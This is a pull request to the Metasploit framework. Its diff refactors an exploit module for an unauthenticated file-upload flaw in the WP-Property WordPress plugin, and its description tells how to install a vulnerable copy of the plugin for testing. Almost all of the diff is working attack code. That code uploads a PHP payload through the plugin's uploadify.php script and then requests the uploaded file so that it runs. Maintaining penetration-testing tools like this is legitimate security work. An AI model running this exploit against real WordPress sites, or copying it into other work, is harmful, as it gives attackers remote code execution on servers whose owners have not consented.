### PR TITLE
Updated wp_property_upload_exec module

### DIFF
--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -3,23 +3,23 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::PhpEXE
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
-      'Description'    => %q{
+      'Description'    => %q(
           This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
         plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
         temp directory without authentication, which results in arbitrary code execution.
-      },
+      ),
       'Author'         =>
         [
           'Sammy FORGIT',	# initial discovery
@@ -28,82 +28,62 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'OSVDB', '82656' ],
-          [ 'BID', '53787' ],
-          [ 'EDB', '18987'],
-          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
+          %w(OSVDB 82656),
+          %w(BID 53787),
+          %w(EDB 18987),
+          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
         ],
-      'Payload'	     =>
-        {
-          'BadChars' => "\x00",
-        },
       'Platform'       => 'php',
       'Arch'		     => ARCH_PHP,
-      'Targets'        =>
-        [
-          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
-          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
-        ],
+      'Targets'        => [['wp-property <= 1.35.0', {}]],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Mar 26 2012'))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
-      ], self.class)
   end
 
   def check
-    uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
+    uri = normalize_uri(wordpress_url_plugins, 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
-    })
+    )
 
-    if not res or res.code != 200
-      return Exploit::CheckCode::Unknown
-    end
+    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200
 
-    return Exploit::CheckCode::Appears
+    Exploit::CheckCode::Appears
   end
 
   def exploit
-    data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
+    data_uri = normalize_uri(wordpress_url_plugins, 'wp-property', 'third-party', 'uploadify/')
     request_uri = normalize_uri(data_uri, 'uploadify.php')
 
-    peer = "#{rhost}:#{rport}"
-
-    @payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self=>true)
+    payload_name = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 
-    print_status("#{peer} - Uploading payload #{@payload_name}")
-    res = send_request_cgi({
+    print_status("#{peer} - Uploading payload #{payload_name}")
+    res = send_request_cgi(
       'method' => 'POST',
       'uri'    => request_uri,
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => post_data
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
+    if res.nil? || res.code != 200 || res.body !~ /#{payload_name}/
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
+    register_files_for_cleanup(payload_name)
+
     upload_uri = normalize_uri(res.body)
 
-    print_status("#{peer} - Executing payload #{@payload_name}")
-    res = send_request_raw({
+    print_status("#{peer} - Executing payload #{payload_name}")
+    send_request_raw(
       'uri'    => upload_uri,
       'method' => 'GET'
-    })
-
-    if res and res.code != 200
-        fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
-    end
+    )
   end
 end

--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown if res.nil? || res.code != 200
 
-    Exploit::CheckCode::Appears
+    Exploit::CheckCode::Detected
   end
 
   def exploit


### PR DESCRIPTION
This updates the wp_property_upload_exec module to use the wordpress mixin and applies rubocop suggestions.

I found a vulnerable version of the plugin on Github (deleted on wordpress.com). To install it, execute the following from your `wp-content/plugins/` folder:

```
git clone https://github.com/luva/WP-Property.git wp-property
chown -R www-data:www-data wp-property/
```

And activate the plugin in the backend.

Output:
![11](https://cloud.githubusercontent.com/assets/105281/3739886/5bd30304-174f-11e4-8020-67d8cdef0594.png)
